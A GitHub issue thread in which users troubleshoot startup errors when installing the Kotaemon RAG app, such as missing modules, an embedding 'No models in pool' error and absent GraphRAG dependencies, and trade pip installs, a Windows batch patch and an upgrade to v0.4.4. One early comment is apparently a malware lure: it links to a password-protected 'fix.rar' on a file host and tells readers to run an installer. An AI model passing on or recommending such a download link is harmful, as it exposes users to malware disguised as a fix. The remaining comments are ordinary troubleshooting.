### ISSUE TITLE
Not able to run the project as end user

### ISSUE THREAD

**Issue by scifisatan** [Cinnamon/kotaemon#133]
The latest zip extracts to following files:
![image](https://github.com/user-attachments/assets/84e5d7ad-41b1-4e21-bae3-0d47ffbc9e78)

After installation, conda and virtual environment is made, but when app.py is run it gives following error:
```
 File "C:\kotaemon-app\app.py", line 3, in <module>
    from theflow.settings import settings as flowsettings
ModuleNotFoundError: No module named 'theflow'
```
After inspecting both `app.py` and `flowsettings.py` located at root is importing from `theflow.settings` and there is no `theflow` directory or file.

How should i run the project as a user?

**Comment by Taiga-A** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by taprosoft** [comment]
End-users setup is pretty out-dated now. Please wait for 1-2 days and try again with our updated setup for end-users.

**Comment by taprosoft** [comment]
See also https://github.com/Cinnamon/kotaemon/issues/130

**Comment by MarcAstr0** [comment]
I had a similar issue and got the following error:

```
******************************************************
Launching Kotaemon in your browser, please wait...
******************************************************

[nltk_data] Downloading package punkt_tab to
[nltk_data]     /home/mario/Desktop/kotaemon-
[nltk_data]     app/install_dir/env/lib/python3.10/site-
[nltk_data]     packages/llama_index/core/_static/nltk_cache...
[nltk_data]   Unzipping tokenizers/punkt_tab.zip.
Traceback (most recent call last):
  File "/home/mario/Desktop/kotaemon-app/app.py", line 13, in <module>
    from ktem.main import App  # noqa
  File "/home/mario/Desktop/kotaemon-app/install_dir/env/lib/python3.10/site-packages/ktem/main.py", line 3, in <module>
    from ktem.pages.chat import ChatPage
  File "/home/mario/Desktop/kotaemon-app/install_dir/env/lib/python3.10/site-packages/ktem/pages/chat/__init__.py", line 13, in <module>
    from ktem.index.file.ui import File
  File "/home/mario/Desktop/kotaemon-app/install_dir/env/lib/python3.10/site-packages/ktem/index/file/ui.py", line 16, in <module>
    from ktem.utils.render import Render
  File "/home/mario/Desktop/kotaemon-app/install_dir/env/lib/python3.10/site-packages/ktem/utils/render.py", line 4, in <module>
    from fast_langdetect import detect
ModuleNotFoundError: No module named 'fast_langdetect'

Will exit now...
```

My OS is Ubuntu 22.04.4

**Comment by ykiran** [comment]
> I had a similar issue and got the following error:
> 
> ```
> ******************************************************
> Launching Kotaemon in your browser, please wait...
> ******************************************************
> 
> [nltk_data] Downloading package punkt_tab to
> [nltk_data]     /home/mario/Desktop/kotaemon-
> [nltk_data]     app/install_dir/env/lib/python3.10/site-
> [nltk_data]     packages/llama_index/core/_static/nltk_cache...
> [nltk_data]   Unzipping tokenizers/punkt_tab.zip.
> Traceback (most recent call last):
>   File "/home/mario/Desktop/kotaemon-app/app.py", line 13, in <module>
>     from ktem.main import App  # noqa
>   File "/home/mario/Desktop/kotaemon-app/install_dir/env/lib/python3.10/site-packages/ktem/main.py", line 3, in <module>
>     from ktem.pages.chat import ChatPage
>   File "/home/mario/Desktop/kotaemon-app/install_dir/env/lib/python3.10/site-packages/ktem/pages/chat/__init__.py", line 13, in <module>
>     from ktem.index.file.ui import File
>   File "/home/mario/Desktop/kotaemon-app/install_dir/env/lib/python3.10/site-packages/ktem/index/file/ui.py", line 16, in <module>
>     from ktem.utils.render import Render
>   File "/home/mario/Desktop/kotaemon-app/install_dir/env/lib/python3.10/site-packages/ktem/utils/render.py", line 4, in <module>
>     from fast_langdetect import detect
> ModuleNotFoundError: No module named 'fast_langdetect'
> 
> Will exit now...
> ```
> 
> My OS is Ubuntu 22.04.4

Same issue, but on Windows 10 (19045.4529)

**Comment by truongty** [comment]
Do `pip install fast_langdetect` and then after do `pip install plotly` and it will work

**Comment by ykiran** [comment]
> Do `pip install fast_langdetect` and then after do `pip install plotly` and it will work

Thanks for the reply.
I tried installing them and still getting the same error when running run_windows.bat. 
Below is the output for the pip install commands:

> Kiran@Kiran-PC C:\WINDOWS\system32
> (0) > pip install fast_langdetect
> WARNING: Ignoring invalid distribution -ip (c:\python310\lib\site-packages)
> WARNING: Ignoring invalid distribution -ip (c:\python310\lib\site-packages)
> Collecting fast_langdetect
>   Using cached fast_langdetect-0.2.1-py3-none-any.whl (6.5 kB)
> Collecting numpy<2.0.0,>=1.26.4
>   Using cached numpy-1.26.4-cp310-cp310-win_amd64.whl (15.8 MB)
> Collecting robust-downloader>=0.0.2
>   Using cached robust_downloader-0.0.2-py3-none-any.whl (15 kB)
> Collecting fasttext-wheel>=0.9.2
>   Using cached fasttext_wheel-0.9.2-cp310-cp310-win_amd64.whl (241 kB)
> Collecting requests>=2.30.0
>   Using cached requests-2.32.3-py3-none-any.whl (64 kB)
> Collecting pybind11>=2.2
>   Using cached pybind11-2.13.5-py3-none-any.whl (240 kB)
> Requirement already satisfied: setuptools>=0.7.0 in c:\python310\lib\site-packages (from fasttext-wheel>=0.9.2->fast_langdetect) (58.1.0)
> Requirement already satisfied: idna<4,>=2.5 in c:\python310\lib\site-packages (from requests>=2.30.0->fast_langdetect) (3.3)
> Requirement already satisfied: urllib3<3,>=1.21.1 in c:\python310\lib\site-packages (from requests>=2.30.0->fast_langdetect) (1.26.11)
> Requirement already satisfied: certifi>=2017.4.17 in c:\python310\lib\site-packages (from requests>=2.30.0->fast_langdetect) (2022.6.15)
> Requirement already satisfied: charset-normalizer<4,>=2 in c:\python310\lib\site-packages (from requests>=2.30.0->fast_langdetect) (2.1.0)
> Collecting colorlog
>   Using cached colorlog-6.8.2-py3-none-any.whl (11 kB)
> Requirement already satisfied: tqdm in c:\python310\lib\site-packages (from robust-downloader>=0.0.2->fast_langdetect) (4.66.5)
> Requirement already satisfied: colorama in c:\python310\lib\site-packages (from colorlog->robust-downloader>=0.0.2->fast_langdetect) (0.4.6)
> WARNING: Ignoring invalid distribution -ip (c:\python310\lib\site-packages)
> Installing collected packages: requests, pybind11, numpy, colorlog, robust-downloader, fasttext-wheel, fast-langdetect
>   Attempting uninstall: requests
>     WARNING: Ignoring invalid distribution -ip (c:\python310\lib\site-packages)
>     Found existing installation: requests 2.28.1
>     Uninstalling requests-2.28.1:
>       Successfully uninstalled requests-2.28.1
>   Attempting uninstall: numpy
>     WARNING: Ignoring invalid distribution -ip (c:\python310\lib\site-packages)
>     Found existing installation: numpy 1.22.4
>     Uninstalling numpy-1.22.4:
>       Successfully uninstalled numpy-1.22.4
> WARNING: Ignoring invalid distribution -ip (c:\python310\lib\site-packages)
> WARNING: Ignoring invalid distribution -ip (c:\python310\lib\site-packages)
> WARNING: Ignoring invalid distribution -ip (c:\python310\lib\site-packages)
> WARNING: Ignoring invalid distribution -ip (c:\python310\lib\site-packages)
> WARNING: Ignoring invalid distribution -ip (c:\python310\lib\site-packages)
> WARNING: Ignoring invalid distribution -ip (c:\python310\lib\site-packages)
> WARNING: Ignoring invalid distribution -ip (c:\python310\lib\site-packages)
> ERROR: pip's dependency resolver does not currently take into account all the packages that are installed. This behaviour is the source of the following dependency conflicts.
> wtfis 0.0.6 requires requests~=2.28.1, but you have requests 2.32.3 which is incompatible.
> numba 0.56.0 requires numpy<1.23,>=1.18, but you have numpy 1.26.4 which is incompatible.
> Successfully installed colorlog-6.8.2 fast-langdetect-0.2.1 fasttext-wheel-0.9.2 numpy-1.26.4 pybind11-2.13.5 requests-2.32.3 robust-downloader-0.0.2
> 
> Kiran@Kiran-PC C:\WINDOWS\system32
> (0) >
> WARNING: You are using pip version 21.2.4; however, version 24.2 is available.
> You should consider upgrading via the 'C:\Python310\python.exe -m pip install --upgrade pip' command.
> 
> 
> Kiran@Kiran-PC C:\WINDOWS\system32
> (0) > pip install plotly
> WARNING: Ignoring invalid distribution -ip (c:\python310\lib\site-packages)
> WARNING: Ignoring invalid distribution -ip (c:\python310\lib\site-packages)
> Collecting plotly
>   Downloading plotly-5.23.0-py3-none-any.whl (17.3 MB)
>      |████████████████████████████████| 17.3 MB 3.3 MB/s
> Requirement already satisfied: packaging in c:\python310\lib\site-packages (from plotly) (23.2)
> Collecting tenacity>=6.2.0
>   Downloading tenacity-9.0.0-py3-none-any.whl (28 kB)
> WARNING: Ignoring invalid distribution -ip (c:\python310\lib\site-packages)
> Installing collected packages: tenacity, plotly
> WARNING: Ignoring invalid distribution -ip (c:\python310\lib\site-packages)
> WARNING: Ignoring invalid distribution -ip (c:\python310\lib\site-packages)
> Successfully installed plotly-5.23.0 tenacity-9.0.0
> WARNING: Ignoring invalid distribution -ip (c:\python310\lib\site-packages)
> WARNING: Ignoring invalid distribution -ip (c:\python310\lib\site-packages)

And the output of run_windows.bat

> 
> ******************************************************
> Setting up Miniconda
> ******************************************************
> 
> Conda is installed at D:\kotaemon-app\install_dir\conda
> Conda version:
> conda 24.7.1
> 
> ******************************************************
> Creating conda environment
> ******************************************************
> 
> Conda environment exists at D:\kotaemon-app\install_dir\env
> Activate conda environment at D:\kotaemon-app\install_dir\env
> 
> ******************************************************
> Installing Kotaemon
> ******************************************************
> 
> Dependencies are already installed
> 
> ******************************************************
> Setting up a local model
> ******************************************************
> 
> LOCAL_MODEL not set in the `.env` file.
> 
> ******************************************************
> Launching Kotaemon in your browser, please wait...
> ******************************************************
> 
> [nltk_data] Downloading package punkt_tab to D:\kotaemon-
> [nltk_data]     app\install_dir\env\lib\site-
> [nltk_data]     packages\llama_index\core\_static/nltk_cache...
> [nltk_data]   Package punkt_tab is already up-to-date!
> Traceback (most recent call last):
>   File "D:\kotaemon-app\app.py", line 13, in <module>
>     from ktem.main import App  # noqa
>   File "D:\kotaemon-app\install_dir\env\lib\site-packages\ktem\main.py", line 3, in <module>
>     from ktem.pages.chat import ChatPage
>   File "D:\kotaemon-app\install_dir\env\lib\site-packages\ktem\pages\chat\__init__.py", line 13, in <module>
>     from ktem.index.file.ui import File
>   File "D:\kotaemon-app\install_dir\env\lib\site-packages\ktem\index\file\ui.py", line 16, in <module>
>     from ktem.utils.render import Render
>   File "D:\kotaemon-app\install_dir\env\lib\site-packages\ktem\utils\render.py", line 4, in <module>
>     from fast_langdetect import detect
> ModuleNotFoundError: No module named 'fast_langdetect'
> 
> Will exit now...
> Deactivate conda environment at D:\kotaemon-app\install_dir\env
> Script completed successfully.
> Press any key to continue . . .

**Comment by RobTranquillo** [comment]
You can only solve exactly this problem for **Windows** by adding the following to the end of  `:install_dependencies` in `run_windows.bat`:

```
:install_dependencies

[...]

:: Ensure fast_langdetect is installed
python -c "import fast_langdetect" 2>NUL
IF %ERRORLEVEL% NEQ 0 (
    ECHO Installing fast_langdetect
    python -m pip install fast_langdetect || (
        ECHO. && ECHO Failed to install fast_langdetect. Aborting...
        CALL :deactivate_environment
        GOTO :exit_func_with_error
    )
)

:: Ensure plotly is installed
pip list | findstr /C:"plotly" >NUL 2>&1
IF %ERRORLEVEL% NEQ 0 (
    ECHO Installing plotly
    python -m pip install plotly || (
        ECHO. && ECHO Failed to install plotly. Aborting...
        CALL :deactivate_environment
        GOTO :exit_func_with_error
    )
)
GOTO :eof
```

But right after that, `run_windows.bat` or more precisely `app.py` gave a new error **"No models in pool"**:

```
******************************************************
Launching Kotaemon in your browser, please wait...
******************************************************

[nltk_data] Downloading package punkt_tab to D:\Programme\kotaemon-
[nltk_data]     app\install_dir\env\lib\site-
[nltk_data]     packages\llama_index\core\_static/nltk_cache...
[nltk_data]   Package punkt_tab is already up-to-date!
GraphRAG dependencies not installed. GraphRAG retriever pipeline will not work properly.
Traceback (most recent call last):
  File "D:\Programme\kotaemon-app\install_dir\env\lib\site-packages\ktem\index\manager.py", line 60, in build_index
    index.on_create()
  File "D:\Programme\kotaemon-app\install_dir\env\lib\site-packages\ktem\index\file\index.py", line 288, in on_create
    for key, value in self.get_admin_settings().items():
  File "D:\Programme\kotaemon-app\install_dir\env\lib\site-packages\ktem\index\file\index.py", line 347, in get_admin_settings
    embedding_default = embedding_models_manager.get_default_name()
  File "D:\Programme\kotaemon-app\install_dir\env\lib\site-packages\ktem\embeddings\manager.py", line 112, in get_default_name
    raise ValueError("No models in pool")
ValueError: No models in pool

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "D:\Programme\kotaemon-app\app.py", line 15, in <module>
    app = App()
  File "D:\Programme\kotaemon-app\install_dir\env\lib\site-packages\ktem\app.py", line 68, in __init__
    self.initialize_indices()
  File "D:\Programme\kotaemon-app\install_dir\env\lib\site-packages\ktem\app.py", line 79, in initialize_indices
    self.index_manager.on_application_startup()
  File "D:\Programme\kotaemon-app\install_dir\env\lib\site-packages\ktem\index\manager.py", line 188, in on_application_startup
    self.build_index(**index)
  File "D:\Programme\kotaemon-app\install_dir\env\lib\site-packages\ktem\index\manager.py", line 68, in build_index
    raise ValueError(f'Cannot create index "{name}": {e}')
ValueError: Cannot create index "File": No models in pool

Will exit now...
Deactivate conda environment at D:\Programme\kotaemon-app\install_dir\env
Script completed successfully.
```

**Comment by ikros98** [comment]
Same issue here. When I run the app this appears in the log:
`GraphRAG dependencies not installed. GraphRAG retriever pipeline will not work properly`.
And when I try to chat in GraphRAG mode obviously it can't find the libs

**Comment by nitinthewiz** [comment]
Not able to run this as an end-user or dev on a Mac. Kotaemon looks really polished, so looking forward to better instructions from the devs on how to get it up and running. 

Currently running into the issue of "theflow" being missing, regardless of whether I install as a conda env or virtualenv, whether I install as an end user or as a dev.

**Comment by Swallow74** [comment]
> I had a similar issue and got the following error:
> 
> ```
> ******************************************************
> Launching Kotaemon in your browser, please wait...
> ******************************************************
> 
> [nltk_data] Downloading package punkt_tab to
> [nltk_data]     /home/mario/Desktop/kotaemon-
> [nltk_data]     app/install_dir/env/lib/python3.10/site-
> [nltk_data]     packages/llama_index/core/_static/nltk_cache...
> [nltk_data]   Unzipping tokenizers/punkt_tab.zip.
> Traceback (most recent call last):
>   File "/home/mario/Desktop/kotaemon-app/app.py", line 13, in <module>
>     from ktem.main import App  # noqa
>   File "/home/mario/Desktop/kotaemon-app/install_dir/env/lib/python3.10/site-packages/ktem/main.py", line 3, in <module>
>     from ktem.pages.chat import ChatPage
>   File "/home/mario/Desktop/kotaemon-app/install_dir/env/lib/python3.10/site-packages/ktem/pages/chat/__init__.py", line 13, in <module>
>     from ktem.index.file.ui import File
>   File "/home/mario/Desktop/kotaemon-app/install_dir/env/lib/python3.10/site-packages/ktem/index/file/ui.py", line 16, in <module>
>     from ktem.utils.render import Render
>   File "/home/mario/Desktop/kotaemon-app/install_dir/env/lib/python3.10/site-packages/ktem/utils/render.py", line 4, in <module>
>     from fast_langdetect import detect
> ModuleNotFoundError: No module named 'fast_langdetect'
> 
> Will exit now...
> ```
> 
> My OS is Ubuntu 22.04.4

Same issue but on MacOS Sonoma.

**Comment by Swallow74** [comment]
> Do `pip install fast_langdetect` and then after do `pip install plotly` and it will work

In MacOS I tried this solution but it did not work. It keeps giving me the same error.

**Comment by luisricardodiaz** [comment]
> You can only solve exactly this problem for **Windows** by adding the following to the end of `:install_dependencies` in `run_windows.bat`:
> 
> ```
> :install_dependencies
> 
> [...]
> 
> :: Ensure fast_langdetect is installed
> python -c "import fast_langdetect" 2>NUL
> IF %ERRORLEVEL% NEQ 0 (
>     ECHO Installing fast_langdetect
>     python -m pip install fast_langdetect || (
>         ECHO. && ECHO Failed to install fast_langdetect. Aborting...
>         CALL :deactivate_environment
>         GOTO :exit_func_with_error
>     )
> )
> 
> :: Ensure plotly is installed
> pip list | findstr /C:"plotly" >NUL 2>&1
> IF %ERRORLEVEL% NEQ 0 (
>     ECHO Installing plotly
>     python -m pip install plotly || (
>         ECHO. && ECHO Failed to install plotly. Aborting...
>         CALL :deactivate_environment
>         GOTO :exit_func_with_error
>     )
> )
> GOTO :eof
> ```
> 
> But right after that, `run_windows.bat` or more precisely `app.py` gave a new error **"No models in pool"**:
> 
> ```
> ******************************************************
> Launching Kotaemon in your browser, please wait...
> ******************************************************
> 
> [nltk_data] Downloading package punkt_tab to D:\Programme\kotaemon-
> [nltk_data]     app\install_dir\env\lib\site-
> [nltk_data]     packages\llama_index\core\_static/nltk_cache...
> [nltk_data]   Package punkt_tab is already up-to-date!
> GraphRAG dependencies not installed. GraphRAG retriever pipeline will not work properly.
> Traceback (most recent call last):
>   File "D:\Programme\kotaemon-app\install_dir\env\lib\site-packages\ktem\index\manager.py", line 60, in build_index
>     index.on_create()
>   File "D:\Programme\kotaemon-app\install_dir\env\lib\site-packages\ktem\index\file\index.py", line 288, in on_create
>     for key, value in self.get_admin_settings().items():
>   File "D:\Programme\kotaemon-app\install_dir\env\lib\site-packages\ktem\index\file\index.py", line 347, in get_admin_settings
>     embedding_default = embedding_models_manager.get_default_name()
>   File "D:\Programme\kotaemon-app\install_dir\env\lib\site-packages\ktem\embeddings\manager.py", line 112, in get_default_name
>     raise ValueError("No models in pool")
> ValueError: No models in pool
> 
> During handling of the above exception, another exception occurred:
> 
> Traceback (most recent call last):
>   File "D:\Programme\kotaemon-app\app.py", line 15, in <module>
>     app = App()
>   File "D:\Programme\kotaemon-app\install_dir\env\lib\site-packages\ktem\app.py", line 68, in __init__
>     self.initialize_indices()
>   File "D:\Programme\kotaemon-app\install_dir\env\lib\site-packages\ktem\app.py", line 79, in initialize_indices
>     self.index_manager.on_application_startup()
>   File "D:\Programme\kotaemon-app\install_dir\env\lib\site-packages\ktem\index\manager.py", line 188, in on_application_startup
>     self.build_index(**index)
>   File "D:\Programme\kotaemon-app\install_dir\env\lib\site-packages\ktem\index\manager.py", line 68, in build_index
>     raise ValueError(f'Cannot create index "{name}": {e}')
> ValueError: Cannot create index "File": No models in pool
> 
> Will exit now...
> Deactivate conda environment at D:\Programme\kotaemon-app\install_dir\env
> Script completed successfully.
> ```

I tried this and `pip install fast_langdetect and then after do pip install plotly` previously and I still get error: 

`GraphRAG dependencies not installed. GraphRAG retriever pipeline will not work properly.
Traceback (most recent call last):
  File "C:\Users\luisr\Downloads\kotaemon-app\kotaemon-app\install_dir\env\lib\site-packages\ktem\index\manager.py", line 60, in build_index
    index.on_create()
  File "C:\Users\luisr\Downloads\kotaemon-app\kotaemon-app\install_dir\env\lib\site-packages\ktem\index\file\index.py", line 288, in on_create
    for key, value in self.get_admin_settings().items():
  File "C:\Users\luisr\Downloads\kotaemon-app\kotaemon-app\install_dir\env\lib\site-packages\ktem\index\file\index.py", line 347, in get_admin_settings
    embedding_default = embedding_models_manager.get_default_name()
  File "C:\Users\luisr\Downloads\kotaemon-app\kotaemon-app\install_dir\env\lib\site-packages\ktem\embeddings\manager.py", line 112, in get_default_name
    raise ValueError("No models in pool")
ValueError: No models in pool

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "C:\Users\luisr\Downloads\kotaemon-app\kotaemon-app\app.py", line 15, in <module>
    app = App()
  File "C:\Users\luisr\Downloads\kotaemon-app\kotaemon-app\install_dir\env\lib\site-packages\ktem\app.py", line 68, in __init__
    self.initialize_indices()
  File "C:\Users\luisr\Downloads\kotaemon-app\kotaemon-app\install_dir\env\lib\site-packages\ktem\app.py", line 79, in initialize_indices
    self.index_manager.on_application_startup()
  File "C:\Users\luisr\Downloads\kotaemon-app\kotaemon-app\install_dir\env\lib\site-packages\ktem\index\manager.py", line 188, in on_application_startup
    self.build_index(**index)
  File "C:\Users\luisr\Downloads\kotaemon-app\kotaemon-app\install_dir\env\lib\site-packages\ktem\index\manager.py", line 68, in build_index
    raise ValueError(f'Cannot create index "{name}": {e}')
ValueError: Cannot create index "File": No models in pool`

I am on Windows 11 Home.

**Comment by yash-web3** [comment]
Traceback (most recent call last):
  File "/workspaces/codespaces-blank/kotaemon/app.py", line 13, in <module>
    from ktem.main import App  # noqa
    ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/workspaces/codespaces-blank/kotaemon/libs/ktem/ktem/main.py", line 2, in <module>
    from ktem.app import BaseApp
  File "/workspaces/codespaces-blank/kotaemon/libs/ktem/ktem/app.py", line 8, in <module>
    from ktem.components import reasonings
  File "/workspaces/codespaces-blank/kotaemon/libs/ktem/ktem/components.py", line 11, in <module>
    from kotaemon.base import BaseComponent
ModuleNotFoundError: No module named 'kotaemon'

**Comment by bookandlover** [comment]
Grapgrag  dependencies not installed.

[nltk_data] Downloading package punkt_tab to
[nltk_data]     /Users/pengxiong/LLM/kotaemon-
[nltk_data]     app/install_dir/env/lib/python3.10/site-
[nltk_data]     packages/llama_index/core/_static/nltk_cache...
[nltk_data]   Unzipping tokenizers/punkt_tab.zip.
themes/theme_schema@0.0.4.json: 100%|██████████████████████████████| 13.7k/13.7k [00:00<00:00, 37.1MB/s]
GraphRAG dependencies not installed. GraphRAG retriever pipeline will not work properly.
User "admin" created successfully
Setting up quick upload event
Running on local URL:  http://127.0.0.1:7860

To create a public link, set `share=True` in `launch()`.
User-id: None, can see public conversations: False
User-id: None, can see public conversations: False

**Comment by MarcAstr0** [comment]
> I had a similar issue and got the following error:
> 
> ```
> ******************************************************
> Launching Kotaemon in your browser, please wait...
> ******************************************************
> 
> [nltk_data] Downloading package punkt_tab to
> [nltk_data]     /home/mario/Desktop/kotaemon-
> [nltk_data]     app/install_dir/env/lib/python3.10/site-
> [nltk_data]     packages/llama_index/core/_static/nltk_cache...
> [nltk_data]   Unzipping tokenizers/punkt_tab.zip.
> Traceback (most recent call last):
>   File "/home/mario/Desktop/kotaemon-app/app.py", line 13, in <module>
>     from ktem.main import App  # noqa
>   File "/home/mario/Desktop/kotaemon-app/install_dir/env/lib/python3.10/site-packages/ktem/main.py", line 3, in <module>
>     from ktem.pages.chat import ChatPage
>   File "/home/mario/Desktop/kotaemon-app/install_dir/env/lib/python3.10/site-packages/ktem/pages/chat/__init__.py", line 13, in <module>
>     from ktem.index.file.ui import File
>   File "/home/mario/Desktop/kotaemon-app/install_dir/env/lib/python3.10/site-packages/ktem/index/file/ui.py", line 16, in <module>
>     from ktem.utils.render import Render
>   File "/home/mario/Desktop/kotaemon-app/install_dir/env/lib/python3.10/site-packages/ktem/utils/render.py", line 4, in <module>
>     from fast_langdetect import detect
> ModuleNotFoundError: No module named 'fast_langdetect'
> 
> Will exit now...
> ```
> 
> My OS is Ubuntu 22.04.4

FYI, I was able to run Kotaemon using the latest version ([v0.4.4](https://github.com/Cinnamon/kotaemon/releases/tag/v0.4.4))

**Comment by nitinthewiz** [comment]
You're right @MarcAstr0, it works with the latest version on MacOS, for me.

**Comment by ykiran** [comment]
> > I had a similar issue and got the following error:
> > ```
> > ******************************************************
> > Launching Kotaemon in your browser, please wait...
> > ******************************************************
> > 
> > [nltk_data] Downloading package punkt_tab to
> > [nltk_data]     /home/mario/Desktop/kotaemon-
> > [nltk_data]     app/install_dir/env/lib/python3.10/site-
> > [nltk_data]     packages/llama_index/core/_static/nltk_cache...
> > [nltk_data]   Unzipping tokenizers/punkt_tab.zip.
> > Traceback (most recent call last):
> >   File "/home/mario/Desktop/kotaemon-app/app.py", line 13, in <module>
> >     from ktem.main import App  # noqa
> >   File "/home/mario/Desktop/kotaemon-app/install_dir/env/lib/python3.10/site-packages/ktem/main.py", line 3, in <module>
> >     from ktem.pages.chat import ChatPage
> >   File "/home/mario/Desktop/kotaemon-app/install_dir/env/lib/python3.10/site-packages/ktem/pages/chat/__init__.py", line 13, in <module>
> >     from ktem.index.file.ui import File
> >   File "/home/mario/Desktop/kotaemon-app/install_dir/env/lib/python3.10/site-packages/ktem/index/file/ui.py", line 16, in <module>
> >     from ktem.utils.render import Render
> >   File "/home/mario/Desktop/kotaemon-app/install_dir/env/lib/python3.10/site-packages/ktem/utils/render.py", line 4, in <module>
> >     from fast_langdetect import detect
> > ModuleNotFoundError: No module named 'fast_langdetect'
> > 
> > Will exit now...
> > ```
> > 
> > 
> >     
> >       
> >     
> > 
> >       
> >     
> > 
> >     
> >   
> > My OS is Ubuntu 22.04.4
> 
> FYI, I was able to run Kotaemon using the latest version ([v0.4.4](https://github.com/Cinnamon/kotaemon/releases/tag/v0.4.4))

Can confirm. Working on Windows 10.

**Comment by costacostatattooz** [comment]
I solved it. I had the same error but im using arch linux. you will have to install torch and pip install raggraph and the other dependencies. Now my terminal outputs this without errors: python app.py
User "admin" already exists
Setting up quick upload event
Running on local URL:  http://127.0.0.1:7860

To create a public link, set `share=True` in `launch()`.
User-id: None, can see public conversations: False
User-id: 1, can see public conversations: True
len(results)=8, len(file_list)=8
len(results)=0, len(file_list)=1

**Comment by costacostatattooz** [comment]
> Same issue here. When I run the app this appears in the log: `GraphRAG dependencies not installed. GraphRAG retriever pipeline will not work properly`. And when I try to chat in GraphRAG mode obviously it can't find the libs

I solved it. I had the same error but im using arch linux. you will have to install torch and pip install raggraph and the other dependencies. Now my terminal outputs this without errors: python app.py
User "admin" already exists
Setting up quick upload event
Running on local URL: http://127.0.0.1:7860/

To create a public link, set share=True in launch().
User-id: None, can see public conversations: False
User-id: 1, can see public conversations: True
len(results)=8, len(file_list)=8
len(results)=0, len(file_list)=1

**Comment by celobusana** [comment]
> Traceback (most recent call last): File "/workspaces/codespaces-blank/kotaemon/app.py", line 13, in from ktem.main import App # noqa ^^^^^^^^^^^^^^^^^^^^^^^^^ File "/workspaces/codespaces-blank/kotaemon/libs/ktem/ktem/main.py", line 2, in from ktem.app import BaseApp File "/workspaces/codespaces-blank/kotaemon/libs/ktem/ktem/app.py", line 8, in from ktem.components import reasonings File "/workspaces/codespaces-blank/kotaemon/libs/ktem/ktem/components.py", line 11, in from kotaemon.base import BaseComponent ModuleNotFoundError: No module named 'kotaemon'

The same here. Running locally Linux Ubuntu. Python 3.12.3.

**Comment by kakolla** [comment]
Has anyone managed to find a fix for "GraphRAG dependencies not installed. GraphRAG retriever pipeline will not work properly"?

Kotaemon runs on my end (Windows 11, Python 3.12.4), but not the GraphRAG feature. Tried installing torch and graphrag but those requirements were already satisfied. I'm not sure what other dependencies it depends on. Thanks
